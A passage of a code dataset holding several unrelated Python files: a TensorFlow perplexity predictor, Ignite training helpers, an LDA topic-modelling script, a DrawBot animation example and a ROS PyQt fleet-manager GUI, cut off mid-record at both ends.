{}\n for i in range(FLAGS.num_core_per_host):\n for m, m_np in zip(tower_mems[i], tower_mems_np[i]):\n feed_dict[m] = m_np\n\n for id, id_np in zip(tower_mems_id[i], tower_mems_id_np[i]):\n feed_dict[id] = id_np\n \n sess.run(iterator.initializer, feed_dict={test_list: \\\n [[input_batch[i][token-1]] for i in range(per_core_bsz)]})\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n #print(feed_dict)\n\n tower_mems_np, output = fetched[:2]\n\n tower_mems_id_np = fetched[2]\n\n for txt_id in 
range(per_core_bsz):\n tmp_list = output[0][-1][txt_id]\n tmp_list = tmp_list.tolist()\n e_sum = sum([math.exp(i) for i in tmp_list])\n log_prob_list = [math.log(math.exp(i)) - math.log(e_sum) for i in tmp_list]\n\n log_probs[txt_id].append(log_prob_list[input_batch[txt_id][token]])\n\n for txt_id in range(per_core_bsz):\n sent_ppl_list[txt_id].append(_cal_ppl(log_probs[txt_id], input_lens[txt_id]))\n \n sent_ppl_list_merge = []\n for i in range(per_core_bsz):\n sent_ppl_list_merge.extend(sent_ppl_list[i])\n\n return sent_ppl_list_merge\n \n\ndef single_core_graph_for_inference(n_token, cutoffs, is_training, inp, mems, mems_id):\n model_fn = get_model_fn_for_inference(\n n_token=n_token,\n cutoffs=cutoffs)\n\n model_ret = model_fn(\n inp=inp,\n mems=mems,\n mems_id=mems_id,\n is_training=is_training)\n\n return model_ret\n\n\ndef get_model_fn_for_inference(n_token, cutoffs):\n def model_fn(inp, mems, mems_id, is_training):\n inp = tf.transpose(inp, [1, 0])\n\n if FLAGS.init == \"uniform\":\n initializer = tf.initializers.random_uniform(\n minval=-FLAGS.init_range,\n maxval=FLAGS.init_range,\n seed=None)\n elif FLAGS.init == \"normal\":\n initializer = tf.initializers.random_normal(\n stddev=FLAGS.init_std,\n seed=None)\n proj_initializer = tf.initializers.random_normal(\n stddev=FLAGS.proj_init_std,\n seed=None)\n\n tie_projs = [False for _ in range(len(cutoffs) + 1)]\n if FLAGS.proj_share_all_but_first:\n for i in range(1, len(tie_projs)):\n tie_projs[i] = True\n new_mems, output, new_mems_id, attn_prob = model.transformer_inference(\n dec_inp=inp,\n mems=mems,\n mems_id=mems_id,\n n_token=n_token,\n n_layer=FLAGS.n_layer,\n d_model=FLAGS.d_model,\n d_embed=FLAGS.d_embed,\n n_head=FLAGS.n_head,\n d_head=FLAGS.d_head,\n d_inner=FLAGS.d_inner,\n dropout=FLAGS.dropout,\n dropatt=FLAGS.dropatt,\n initializer=initializer,\n proj_initializer=proj_initializer,\n is_training=is_training,\n mem_len=FLAGS.mem_len,\n cutoffs=cutoffs,\n div_val=FLAGS.div_val,\n tie_projs=tie_projs,\n input_perms=None,\n target_perms=None,\n head_target=None,\n same_length=FLAGS.same_length,\n clamp_len=FLAGS.clamp_len,\n use_tpu=False,\n untie_r=FLAGS.untie_r,\n proj_same_dim=FLAGS.proj_same_dim)\n\n # number of parameters\n num_params = sum([np.prod(v.shape) for v in tf.trainable_variables()])\n tf.logging.info('#params: {}'.format(num_params))\n\n return new_mems, output, new_mems_id, attn_prob\n\n return model_fn\n\ndef cut_pad(num_list, r_len, pad_value=0):\n if len(num_list) == r_len:\n return num_list\n elif len(num_list) > r_len:\n return num_list[:r_len]\n else:\n return num_list + [pad_value]*(r_len-len(num_list))\n\n\ndef main(unused_argv):\n del unused_argv # Unused\n\n tf.logging.set_verbosity(tf.logging.INFO)\n\n # Get corpus info\n corpus_info = data_utils.get_corpus_info(FLAGS.corpus_info_path)\n n_token = corpus_info[\"vocab_size\"]\n cutoffs = corpus_info[\"cutoffs\"][1:-1]\n tf.logging.info(\"n_token {}\".format(n_token))\n\n tmp_Vocab = Vocab(special=[\"\", \"\", \"\"])\n tmp_Vocab.count_file(\"../data/{}/train.txt\".format(FLAGS.dataset), add_eos=False)\n tmp_Vocab.build_vocab()\n\n if FLAGS.do_sent_ppl_pred:\n encoded_txt_input = []\n txt_input = []\n input_csv = []\n with open(FLAGS.input_file_dir, \"r\") as read_file:\n csv_reader = csv.reader(read_file)\n for line in csv_reader:\n if line[0].strip() != 0:\n input_csv.append(line)\n \n for i in range(1, len(input_csv)):\n txt_input.append(input_csv[i][0].strip())\n encoded_txt_input.append(list(tmp_Vocab.encode_sents(input_csv[i][0].strip(), 
\\\n add_eos=True, ordered=True)))\n\n #txt_input = txt_input[:7]\n #encoded_txt_input = encoded_txt_input[:7]\n\n encoded_txt_input_len = [len(encoded_txt) if len(encoded_txt) <= FLAGS.limit_len else FLAGS.limit_len \\\n for encoded_txt in encoded_txt_input]\n\n encoded_txt_input = [cut_pad(line, FLAGS.limit_len, 0) for line in encoded_txt_input]\n \n if len(encoded_txt_input) % FLAGS.pred_batch_size != 0:\n pad_len = FLAGS.pred_batch_size - (len(encoded_txt_input)%FLAGS.pred_batch_size)\n encoded_txt_input = encoded_txt_input + \\\n [[0]*FLAGS.limit_len]*pad_len\n encoded_txt_input_len = encoded_txt_input_len + \\\n [FLAGS.limit_len]*pad_len\n\n encoded_txt_input = np.array(encoded_txt_input).reshape(FLAGS.pred_batch_size,-1,FLAGS.limit_len)\n encoded_txt_input_len = np.array(encoded_txt_input_len).reshape(FLAGS.pred_batch_size,-1)\n input_csv[0].append(\"ppl\")\n \n if FLAGS.multiprocess == 1 or encoded_txt_input.shape[1]//FLAGS.multiprocess == 0:\n ppl_list = sent_ppl((encoded_txt_input, encoded_txt_input_len), n_token, cutoffs, \"/gpu:1\")\n \n for i in range(1, len(input_csv)):\n input_csv[i].append(ppl_list[i-1])\n output_df = pd.DataFrame(input_csv[1:], columns=input_csv[0])\n output_df.to_csv(FLAGS.output_file_dir, sep=\",\", index=False, encoding=\"utf-8-sig\")\n \n with open(\"sent_ppl_pred.txt\", \"w\") as write_res:\n for i in range(len(txt_input)):\n write_res.write(txt_input[i]+\"\\t\"+str(ppl_list[i])+\"\\n\")\n \n # Check whether the length of the result is right; make sure batch-predict works well\n print(len(ppl_list))\n else:\n pool = multiprocessing.Pool(FLAGS.multiprocess)\n parti_batch_num = encoded_txt_input.shape[1]//FLAGS.multiprocess\n pro_res_l = []\n\n for i in range(FLAGS.multiprocess):\n print(\"Setting process-%s\" % i)\n ### TODO: pick the GPU dynamically here (fall back to the next one once gpu:1 is full)\n\n if i+1 == FLAGS.multiprocess:\n end = encoded_txt_input.shape[1]\n else:\n end = (i+1)*parti_batch_num\n pro_res_l.append(pool.apply_async(sent_ppl, \\\n args=((encoded_txt_input[:,i*parti_batch_num:end,:], \\\n encoded_txt_input_len[:,i*parti_batch_num:end]), \\\n n_token, cutoffs, \"/gpu:1\")))\n \n res_l = [[] for _ in range(FLAGS.pred_batch_size)]\n\n for i in range(len(pro_res_l)):\n proc_i_res = pro_res_l[i].get()\n parti_len = len(proc_i_res)//FLAGS.pred_batch_size\n for j in range(FLAGS.pred_batch_size):\n res_l[j].extend(proc_i_res[j*parti_len:(j+1)*parti_len])\n\n pool.close()\n pool.join()\n print('All subprocesses done.')\n\n res_merge = []\n for i in range(FLAGS.pred_batch_size):\n res_merge.extend(res_l[i])\n tf.logging.info('#time: {}'.format(time.time()))\n \n for i in range(1, len(input_csv)):\n input_csv[i].append(res_merge[i-1])\n output_df = pd.DataFrame(input_csv[1:], columns=input_csv[0])\n output_df.to_csv(FLAGS.output_file_dir, sep=\",\", index=False, encoding=\"utf-8-sig\")\n\n with open(\"sent_ppl_pred.txt\", \"w\") as write_res:\n for i in range(len(txt_input)):\n write_res.write(txt_input[i] + \"\\t\" + str(res_merge[i]) + \"\\n\")\n \n # Check whether the length of the result is right; make sure multiprocess works well\n print(len(res_merge))\n \n \nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"tf/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":20453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
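The `_cal_ppl` helper in the predict.py record above turns summed token log-probabilities into sentence perplexity, and `cut_pad` normalizes sequence lengths before batching. A self-contained sketch of the same two pieces (the function bodies mirror the record; the numbers are illustrative only):

```python
import math

def cut_pad(num_list, r_len, pad_value=0):
    # Truncate or right-pad a token-id list to exactly r_len entries.
    if len(num_list) >= r_len:
        return num_list[:r_len]
    return num_list + [pad_value] * (r_len - len(num_list))

def perplexity(log_probs, sent_len):
    # ppl = exp(-(1/N) * sum(log p(token_i))); the first token is a
    # special symbol in the script above, hence sent_len - 1 terms.
    log_prob = sum(log_probs[:sent_len - 1])
    return math.exp(-log_prob / (sent_len - 1))

assert cut_pad([1, 2, 3], 5) == [1, 2, 3, 0, 0]
assert cut_pad([1, 2, 3, 4, 5, 6], 5) == [1, 2, 3, 4, 5]
# Two tokens each predicted with probability 0.5 -> perplexity 2.
print(perplexity([math.log(0.5), math.log(0.5)], 3))  # 2.0
```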
+{"seq_id":"204036589","text":"# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\nfrom ignite.engine import Engine, _prepare_batch\nfrom ignite.engine import Events\nfrom ignite.contrib.handlers import ProgressBar\nfrom ignite.metrics import Accuracy, Loss, RunningAverage\n\n\ndef create_custom_supervised_trainer(model, optimizer, loss_fn, metrics={}, device=None, prepare_batch=None):\n \"\"\"\n We need to make some changes to the default trainer so we can use running metrics and consume Tensors from DALI\n \"\"\"\n\n def _update(engine, batch):\n model.train()\n optimizer.zero_grad()\n if not prepare_batch:\n x, y = _prepare_batch(batch, device=device)\n else:\n x, y = prepare_batch(batch, device=device)\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n loss.backward()\n optimizer.step()\n return loss.item(), y_pred, y\n\n def _metrics_transform(output):\n return output[1], output[2]\n\n engine = Engine(_update)\n\n for name, metric in metrics.items():\n metric._output_transform = _metrics_transform\n metric.attach(engine, name)\n\n return engine\n\n\ndef make_keras_like(trainer, evaluator, validation_loader):\n \"\"\"\n \"I can't believe it's not Keras\"\n Running average accuracy and loss metrics + TQDM progressbar\n \"\"\"\n training_history = {'accuracy': [], 'loss': []}\n validation_history = {'accuracy': [], 'loss': []}\n last_epoch = []\n\n RunningAverage(output_transform=lambda x: x[0]).attach(trainer, 'loss')\n RunningAverage(Accuracy(output_transform=lambda x: (x[1], x[2]))).attach(trainer, 'accuracy')\n\n prog_bar = ProgressBar()\n prog_bar.attach(trainer, ['loss', 'accuracy'])\n\n prog_bar_vd = ProgressBar()\n prog_bar_vd.attach(evaluator)\n from ignite.handlers import Timer\n\n timer = Timer(average=True)\n timer.attach(trainer, start=Events.EPOCH_STARTED,\n resume=Events.EPOCH_STARTED,\n pause=Events.EPOCH_COMPLETED,\n step=Events.EPOCH_COMPLETED)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(trainer):\n metrics = trainer.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n last_epoch.append(0)\n training_history['accuracy'].append(accuracy)\n training_history['loss'].append(loss)\n train_msg = \"Train Epoch {}: acc: {:.2f}% loss: \".format(trainer.state.epoch, accuracy) + \\\n \"{:.2f}, train time: {:.2f}s\".format(loss, timer.value())\n\n evaluator.run(validation_loader)\n metrics = evaluator.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n validation_history['accuracy'].append(accuracy)\n validation_history['loss'].append(loss)\n val_msg = \"Valid Epoch {}: acc: {:.2f}% loss: {:.2f}\".format(trainer.state.epoch, accuracy, loss)\n\n prog_bar_vd.log_message(train_msg + \" --- \" + val_msg)\n","sub_path":"examples/contrib/DALI/dali_example_utilities.py","file_name":"dali_example_utilities.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"12176790","text":"import numpy as np\nimport pickle\nfrom gensim import corpora, models\n\n\n\n# load the coco activations obtained from running AlexNet on COCO\nyfcc100m_activations = np.load('data/yfcc100m_output_100k_crop.npy')\n\n# load 90th percentile thresholds obatined from running AlexNet on ImageNet\nimagenet_percentile_threshold = np.load('data/percentiles_imagenet.npy')\n\n# load tht list of images\nimg_list = np.load('data/image_list_yfcc100m_output_100k_crop.npy')\n\n# get features in each image in COCO which activate (have values which go above 90-percentileImageNet threshold)\nactivated_features_all_images_yfcc100m = (yfcc100m_activations >= imagenet_percentile_threshold)*1\nnp.save('data/one_hot_yfcc100m',activated_features_all_images_yfcc100m)\n\n# Load data\nX = np.load('data/one_hot_yfcc100m.npy')\n\n# Get data statistics, as a sanity check\nprint(\"Data shape: \", X.shape)\nprint(\"Number of 0s: \", np.sum(X == 1))\nprint(\"Number of 1s: \", np.sum(X == 0))\nprint(\"Anomailes: \",np.sum([X < 0]))\n\n# Define parameters for topic modelling\nnum_topics = [20, 50, 100]\nnum_words = 4096 # Number of top features to be displayed per topic\nnum_images = X.shape[0]\n\n# Prepare for corpus\ncorpus = [[(j, X[i, j]) for j in range(num_words) if X[i, j]==1] for i in range(num_images)]\ncorpora.MmCorpus.serialize('data/corpus.mm', corpus)\n\n# Load corpus\ncorpus = corpora.MmCorpus('data/corpus.mm')\n\nfor K in num_topics:\n # Create the Topic Model\n model_name = str(K) + '-topics.model'\n lda = models.ldamodel.LdaModel(corpus, num_topics = K)\n lda.save('data/' + model_name)\n\n # Get topic for each image\n img_by_topic = [[] for _ in range(K)]\n for i in range(num_images):\n ind, val = sorted(lda.get_document_topics(corpus[i]), key=lambda x:x[1])[-1]\n img_by_topic[ind].append((i, val))\n\n for j in range(K):\n img_by_topic[j].sort(key = lambda x: -x[1])\n\n # Save results\n with open(\"data/\" + str(K) + \"-topic-res.txt\", \"wb\") as fp:\n pickle.dump(img_by_topic, fp)\n\n# Load results\nwith open(\"data/2-topic-res.txt\", \"rb\") as fp:\n img_by_topic = pickle.load(fp)\n","sub_path":"topic_models.py","file_name":"topic_models.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"312764897","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens & Font Bureau\n# www.pagebot.io\n#\n# P A G E B O T\n#\n# Licensed under MIT conditions\n#\n# Supporting usage of DrawBot, www.drawbot.com\n# Supporting usage of Flat, https://github.com/xxyxyz/flat\n# -----------------------------------------------------------------------------\n#\n# Horizon.py\n#\nfrom random import choice\nfrom pagebot.builders import drawBotBuilder as b\nif b is None:\n print ('Example runs only in DrawBot')\nelse:\n LETTERS = 'ABCEFGHIJKLMNOPQTSTIVWXUZ'\n\n Frames = 100\n\n W = H = 500\n IMAGE_PATH = '_export/HorizonWorld.gif'\n if not 'BitcountMonoDouble-RegularCircle' in b.installedFonts():\n fontNames = ['Georgia-Bold', 'Georgia']\n else:\n fontNames = []\n for fontName in installedFonts():\n if 'BitcountMono' in fontName and not 'Italic' in fontName:\n fontNames.append(fontName)\n \n letters = []\n for n in range(10):\n c = choice(LETTERS)\n x = 0 \n y = 15 \n z = 20+int(random()*500)\n\n x = 1/z + random()*100-100\n cc = random()*0.8+0.1, random()*0.1, random()*0.8*0.1\n f = choice(fontNames)\n letters.append((c, f, x, y, z, cc))\n \n for n in range(Frames):\n b.newPage(W, H)\n b.fill(0.8)\n b.rect(0, 0, W, H)\n for c, f, x, y, z, (r, g, b) in letters:\n #y = y/z\n b.fill(r, g, b)\n b.font(f)\n b.stroke(None)\n fSize = min(200, 40000/z)\n b.fontSize(fSize)\n b.text(c, (x+250, y+250-fSize/2))\n\n b.fill(None)\n b.strokeWidth(0.5)\n b.stroke(0.5)\n b.line((0, 250), (500, 250))\n \n b.fill(1, 1, 1, 0.4)\n b.rect(0, 0, W, H/2-1)\n \n for n in range(0, 500, 10):\n b.fill(None)\n b.stroke(1)\n y = W/2-2 - n*0.4\n lineThickness = (random()*3+0.5) * (H/2 - y)/10\n b.strokeWidth(lineThickness)\n b.line((0, y-lineThickness/2), (W, y-lineThickness/2))\n \n b.saveImage(IMAGE_PATH)\n\n","sub_path":"Examples/Compositions/Horizon.py","file_name":"Horizon.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"100812546","text":"#! /usr/bin/env python\nimport json # Used for reading JSON files (loading jobs to JobQueue)\nimport os # Used to get base filename and file and directory handling\nimport sys\n\nimport rospy\nfrom PyQt4 import QtGui, QtCore\n\nfrom rooster_fleet_manager.srv import PlaceOrder, PlaceOrderRequest, GetPendingJobs, GetPendingJobsRequest, GetActiveJobs, GetActiveJobsRequest\nfrom rooster_fleet_manager.msg import MexListInfo\nfrom ui import fleet_manager_ui\nfrom JobManager.Order import *\nfrom JobManager.Job import JobStatus, Job, JobPriority\n\n#region ################################### TO DO LIST #####################################\n# DONE 1. Perform simple call /job_manager/place_order service.\n# DONE 2. Load list of orders from JSON.\n# DONE 3. Call /job_manager/place_order(s?) service with the list of orders.\n# DONE 4. Add visually correct but non-functional GUI to node.\n# DONE 5. Replace JSON order list call and instead visualize it in the Order tab.\n# DONE 6. Connect MEx Sentinel to Mobile Executors treeWidget view.\n# DONE 7. Check if the order is viable before adding to order list, notify user if not.\n# DONE 8. Remove orders from Order list if they were placed succesfully.\n# DONE 9. Put in Placeholder text in the arguments field based on the order keyword.\n# DONE 10. Connect Job Manager to the Jobs treeWidget view.\n# DONE 11. Add the deletion of individual orders from the order list.\n# DONE 12. Replace placeholders in the FILE ACTION MENU.\n# DONE 13. Add logo in same style as GUI launcher.\n# DONE 14. Automatically sort the Jobs list when new jobs have been added.\n# DONE 15. Add KEYWORD to Job. \n# DONE 16. Fix issue where Job list does not update when <= 1 Jobs after Job completions.\n#endregion #################################################################################\n\n\nVERSION = \"1.0\"\nAPPLICATION_TITLE = \"Fleet Manager\"\nNODE_NAME = \"[fleet_manager_front] \"\nprint(NODE_NAME + APPLICATION_TITLE + \". 
Version: \"+VERSION)\n\n\n#region ### PyQt GUI ###\nclass GuiMainWindow(fleet_manager_ui.Ui_MainWindow, QtGui.QMainWindow):\n def __init__(self):\n \"\"\"\n Initialise the ui widgets, items and varibles.\n Connect up all UI interactions to their methods.\n \"\"\"\n super(GuiMainWindow, self).__init__()\n self.setWindowTitle(APPLICATION_TITLE) #self.filename + \" - \" + \n\n # Set up gui\n self.setupUi(self)\n\n #region FILE ACTION MENU\n self.actionAbout.triggered.connect(self.about)\n self.actionQuit_application.triggered.connect(self.close_application)\n #endregion\n\n #region ORDERS TAB\n self.pushButtonAddOrder.clicked.connect(self.add_order)\n self.pushButtonClearList.clicked.connect(self.clear_order_list)\n self.pushButtonPlaceOrder.clicked.connect(self.place_order_list)\n self.comboBoxKeyword.currentIndexChanged.connect(self.update_order_arguments_placeholder_text)\n self.lineEditArguments.setPlaceholderText(\"location\")\n\n # TreeWidget context menu\n self.treeWidgetOrders.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.treeWidgetOrders.customContextMenuRequested.connect(self.open_context_menu) \n\n self.treeMenu = QtGui.QMenu('Menu', self)\n deleteItem = QtGui.QAction(\"&Delete\", self)\n deleteItem.setStatusTip(\"Delete item from Order list\")\n deleteItem.triggered.connect(self.delete_orders_tree_item)\n deleteIcon = QtGui.QIcon()\n deleteIcon.addPixmap(QtGui.QPixmap(\":/icons/Close.png\"))\n deleteItem.setIcon(deleteIcon)\n self.treeMenu.addAction(deleteItem)\n\n #endregion\n\n def open_context_menu(self):\n \"\"\" Opens the Right-Mouse-Button context menu, showing an option to delete the order tree item. \"\"\"\n self.treeMenu.exec_(QtGui.QCursor.pos())\n\n def delete_orders_tree_item(self, item):\n \"\"\" Deletes the currently selected item from the orders treeWidget. \"\"\"\n index = self.treeWidgetOrders.currentIndex()\n self.treeWidgetOrders.takeTopLevelItem(index.row())\n\n def update_order_arguments_placeholder_text(self):\n \"\"\"\n Updates the light gray placeholder text of the Order arguments lineEdit\n input field to match with the new keyword.\n \"\"\"\n keyword = str(self.comboBoxKeyword.currentText())\n if keyword == OrderKeyword.LOAD.name or keyword == OrderKeyword.UNLOAD.name:\n self.lineEditArguments.setPlaceholderText(\"No Arguments!\")\n elif keyword == OrderKeyword.MOVE.name:\n self.lineEditArguments.setPlaceholderText(\"location\")\n elif keyword == OrderKeyword.TRANSPORT.name:\n self.lineEditArguments.setPlaceholderText(\"location1 location2\")\n \n def place_order_list(self):\n \"\"\" Place multiple orders from the Order tab Order list to the Job Manager. \"\"\"\n # The order of the orders matter, so don't just loop over the dictionary, but check size and loop over order id's\n self.order_list = [] # Empty order list\n indices_to_remove = [] # Empty list for treeWidgetOrders indices.\n\n # Iterate over all the existing (top level) items (a.k.a. 
orders) in the treeWidgetOrders and add as order.\n root = self.treeWidgetOrders.invisibleRootItem()\n child_count = root.childCount()\n for i in range(child_count):\n item = root.child(i)\n order_keyword = str(item.text(0))\n order_priority = str(item.text(1))\n order_arguments = str(item.text(2)).split()\n order = [order_keyword, order_priority, order_arguments, i]\n self.order_list.append(order)\n \n # If there are orders to be placed, call the job_manager's place_order service.\n if len(self.order_list) != 0:\n rospy.wait_for_service('/job_manager/place_order')\n try:\n place_order = rospy.ServiceProxy('/job_manager/place_order', PlaceOrder)\n req = PlaceOrderRequest()\n for order in self.order_list:\n req.keyword = order[0]\n req.priority = order[1]\n req.order_args = order[2]\n resp = place_order(req)\n print(NODE_NAME + \"Response: \", resp)\n if resp.error_status == OrderResponseStatus.SUCCES.name:\n # The placement of this order was successful, remove from Order list\n indices_to_remove.append(order[3])\n except rospy.ServiceException as e:\n print(NODE_NAME + \"Service call failed: %s\"%e)\n \n if len(indices_to_remove) != 0:\n # Sort the indices list in descending order (from highest index to lowest index).\n indices_to_remove.sort(reverse=True)\n # Iterate over the sorted list, removing items from the treeWidgetOrders\n for index in indices_to_remove:\n self.treeWidgetOrders.takeTopLevelItem(index)\n \n if len(indices_to_remove) != len(self.order_list):\n # Show a notification box alerting the user not all orders were placed successfully.\n QtGui.QMessageBox.warning(self, \"Not all orders could be placed successfully!\", \"Out of the \" + str(len(self.order_list)) + \" orders, \" + str(len(self.order_list) - len(indices_to_remove)) + \" could not be placed successfully. These orders have been kept in the order list, successful orders have been removed.\")\n else:\n # Show a notification informing the user that all orders were placed successfully.\n QtGui.QMessageBox.information(self, \"All orders placed successfully!\", \"All \" + str(len(self.order_list)) + \" order(s) have been placed successfully and have been removed from the order list.\")\n\n\n def clear_order_list(self):\n \"\"\"Clears the Order tab order list.\"\"\"\n root = self.treeWidgetOrders.invisibleRootItem()\n child_count = root.childCount()\n if child_count > 0:\n self.treeWidgetOrders.clear()\n\n def add_order(self):\n \"\"\"\n Add an order to the Order List based on the Order tab input field values.\n Before adding, a check is performed to make sure the supplied fields are set correctly.\n If this is not the case the user is notified with a MessageBox.\n \"\"\"\n order_keyword = self.comboBoxKeyword.currentText()\n order_priority = self.comboBoxPriority.currentText()\n order_arguments = self.lineEditArguments.text()\n \n # Check if the number of supplied arguments matches the expected count.\n supplied_args = len(str(order_arguments).split())\n expected_args = OrderTypeArgCount[str(order_keyword)].value\n\n if supplied_args == expected_args:\n # Add the order to the order list.\n self.lineEditArguments.clear()\n order_item = QtGui.QTreeWidgetItem([order_keyword, order_priority, order_arguments])\n self.treeWidgetOrders.addTopLevelItem(order_item)\n else:\n # Show a notification informing the user that the order is incorrect.\n QtGui.QMessageBox.information(self, \"Incorrect number of order arguments!\", \"Incorrect number of arguments. Supplied \" + str(supplied_args) + \" argument(s) (\" + order_arguments + \"). 
Expected \" + str(expected_args) + \" argument(s).\")\n\n\n def close_application(self):\n \"\"\"Prompts the user if they are sure they which to quit the application before quitting.\"\"\"\n choice = QtGui.QMessageBox.question(self, \n 'Quit application?',\n \"Are you sure you want to quit? Any unsaved changed will be lost!\", \n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\n \n if choice == QtGui.QMessageBox.Yes:\n print(NODE_NAME + \"Closing Fleet Manager node...\")\n QtCore.QCoreApplication.instance().quit()\n else:\n pass\n \n def closeEvent(self, event):\n \"\"\"Takes control of the close event, making sure the user cannot close the application before prompting them.\"\"\"\n event.ignore()\n self.close_application()\n \n def about(self):\n \"\"\"Display a MessageBox with the application title, version number and general information.\"\"\"\n text = \"
\" \\\n \"
\"+APPLICATION_TITLE+\"
\" \\\n \"
\" \\\n \"The ROS package rooster_fleet_manager is created by the Human \" \\\n \"Robot Co-production research group at the Industrial Design \" \\\n \"Engineering faculty of the Delft University of Technology.\" \\\n \"
Version: \"+VERSION+\" \" \\\n \"License: Apache License version 2.0
\"\n QtGui.QMessageBox.about(self, \"About - \" + APPLICATION_TITLE + \".\", text)\n\n#endregion ### PyQt GUI ###\n\n\n\n\n\ndef load_orders_from_JSON(filepath):\n \"\"\" Function; Add one or multiple orders from a JSON file. \"\"\"\n # Load JSON file into dictionary\n loaddata_dict = None\n with open(filepath) as json_loadfile:\n loaddata_dict = json.load(json_loadfile)\n \n # Add orders from loaded JSON dictionary to the Order tab Order list.\n for order_id in range(len(loaddata_dict)):\n order_info_dict = loaddata_dict[str(order_id)]\n item_keyword = order_info_dict[\"keyword\"]\n item_priority = order_info_dict[\"priority\"]\n item_order_args = order_info_dict[\"order_args\"]\n item_arguments = \"\"\n for arg in item_order_args:\n item_arguments = item_arguments + \" \" + arg\n order_item = QtGui.QTreeWidgetItem([item_keyword, item_priority, item_arguments])\n appGui.treeWidgetOrders.addTopLevelItem(order_item)\n\ndef job_list_cb(event):\n \"\"\"\n Timer callback function, attempts to call Job Manager 'get_pending_jobs' & \n 'get_active_jobs' services for updating the Jobs treeWidget list.\n \"\"\"\n combined_jobs_list = [] # Empty list for the jobs to be appened to.\n\n # Retrieve pending jobs.\n try:\n rospy.wait_for_service('/job_manager/get_pending_jobs', rospy.Duration(1))\n try:\n get_pending_jobs = rospy.ServiceProxy('/job_manager/get_pending_jobs', GetPendingJobs)\n req = GetPendingJobsRequest()\n resp = get_pending_jobs(req)\n if resp.jobs_count > 0:\n # Add jobs to combined_jobs_list\n for job in resp.jobs:\n # [0 ID, 1 Priority, 2 Keyword, 3 Status, 4 MEx ID, 5 Task Count, 6 Current Task, 7 processed]\n combined_jobs_list.append([job.job_id, job.priority, job.keyword, JobStatus.PENDING.name, None, job.task_count, 0, False])\n except rospy.ServiceException as e:\n print(NODE_NAME + \"Service call failed: %s\"%e)\n except rospy.ROSException:\n pass\n\n # Retrieve active jobs.\n try:\n rospy.wait_for_service('/job_manager/get_active_jobs', rospy.Duration(1))\n try:\n get_active_jobs = rospy.ServiceProxy('/job_manager/get_active_jobs', GetActiveJobs)\n req = GetActiveJobsRequest()\n resp = get_active_jobs(req)\n if resp.jobs_count > 0:\n # Add jobs to combined_jobs_list\n for job in resp.jobs:\n # [0 ID, 1 Priority, 2 Keyword, 3 Status, 4 MEx ID, 5 Task Count, 6 Current Task, 7 processed]\n combined_jobs_list.append([job.job_id, job.priority, job.keyword, job.status, job.mex_id, job.task_count, job.current_task+1, False])\n except rospy.ServiceException as e:\n print(NODE_NAME + \"Service call failed: %s\"%e)\n except rospy.ROSException:\n pass\n\n # if len(combined_jobs_list) > 0:\n update_jobs_list(combined_jobs_list)\n\ndef update_jobs_list(combined_jobs_list):\n \"\"\"\n Add new/update existing items in the Jobs treeWidget with response information:\n 1. Take in pending jobs and active jobs info into a single list.\n 2. Loop over exisiting Job items in the treeWidget.\n 3. If the job is in the list, update information.\n 4. If it's not in the list, mark index for removal.\n 5. If not all list items have been processed, this means it's new. Add new job items to the treeWidget.\n 6. 
Loop over indices_for_removal list in descending order and remove all job items no longer existing.\n \"\"\"\n # [2, 3, 4] First check if current Job items in the treeWidget require updating or removing.\n root = appGui.treeWidgetJobs.invisibleRootItem()\n child_count = root.childCount()\n indices_for_removal = [] # Empty list to which indices can be appended which can be removed after updating others.\n for i in range(child_count): # Iterate over all the existing (top level) items (a.k.a. jobs) in the treeWidgetJobs.\n item = root.child(i)\n job_id = str(item.text(0))\n\n # Loop over all job information lists in the combined_jobs_list, checking if the 'job_id' is in there.\n for job_info_list in combined_jobs_list:\n if job_id in job_info_list:\n # It's in there, so update the information and mark processed as True.\n item.setText(0, job_info_list[0])\n item.setText(1, str(JobPriority[str(job_info_list[1])].value)+\" / \"+job_info_list[1])\n item.setText(2, job_info_list[2])\n item.setText(3, job_info_list[3])\n item.setText(4, \"\\xA0\" if job_info_list[4] == None else \"\"+str(job_info_list[4]) )\n item.setText(5, str(job_info_list[6])+\" / \"+str(job_info_list[5]) )\n job_info_list[7] = True\n break\n else:\n # The job item with its job id is no longer in the Job Manager's job lists, thus mark it for removal.\n indices_for_removal.append(i)\n \n # [5] Check for unprocessed list items, adding them as new items to the jobs treeWidget\n for job_info_list in combined_jobs_list:\n if job_info_list[7] == False:\n job_item = QtGui.QTreeWidgetItem( [ \n str(job_info_list[0]), \n str(JobPriority[str(job_info_list[1])].value)+\" / \"+job_info_list[1], \n str(job_info_list[2]), \n str(job_info_list[3]), \n \"\\xA0\" if job_info_list[4] == None else \"\"+str(job_info_list[4]), \n str(job_info_list[6])+\"/\"+str(job_info_list[5]) ] )\n appGui.treeWidgetJobs.addTopLevelItem(job_item)\n\n # [6] Remove items which were marked for removal\n if len(indices_for_removal) != 0:\n # Sort the indices list in descending order (from highest index to lowest index).\n indices_for_removal.sort(reverse=True)\n # Iterate over the sorted list, removing items from the treeWidgetJobs\n for index in indices_for_removal:\n appGui.treeWidgetJobs.takeTopLevelItem(index)\n \n \ndef mex_list_info_cb(data):\n \"\"\"\n Subscription callback for the MEx Sentinel mex_list_info topic. \n 1. Take in MEx info.\n 2. Loop over existing MEx items in the treeWidget.\n 3. If the MEx is in the list, update information.\n 4. If it's not in the list, mark index for removal.\n 5. If not all list items have been processed, this means it's new. Add new MEx items to the treeWidget.\n 6. 
